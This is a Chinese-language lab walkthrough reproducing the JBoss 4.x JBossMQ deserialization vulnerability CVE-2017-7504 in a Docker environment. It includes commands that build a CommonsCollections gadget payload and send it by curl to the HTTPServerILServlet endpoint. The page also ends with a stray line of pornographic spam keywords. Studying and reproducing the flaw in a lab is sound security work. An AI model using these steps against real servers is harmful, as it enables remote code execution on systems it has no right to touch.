<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

    Path jboss/CVE-2017-7504

    Red Hat JBoss Application Server 是一款基于JavaEE的開源應用服務器。JBoss AS 4.x及之前版本中,JbossMQ實現過程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,遠程攻擊者可借助特制的序列化數據利用該漏洞執行任意代碼。

    參考:

    漏洞環境

    執行如下命令啟動JBoss AS 4.0.5:

    docker-compose up -d

    環境啟動后,目標為http://your-ip:8080

    漏洞復現

    參考利用工具JavaDeserH2HC,我們選擇一個Gadget:ExampleCommonsCollections1WithHashMap,編譯并生成序列化數據:

    javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
    java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"

    可見,我們執行的命令是touch /tmp/success。執行完成后,將生成一個文件ExampleCommonsCollections1WithHashMap.ser,將該文件作為body發送如下數據包:

    curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

    執行docker-compose exec jboss bash進入容器,可見/tmp/success已成功創建。

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类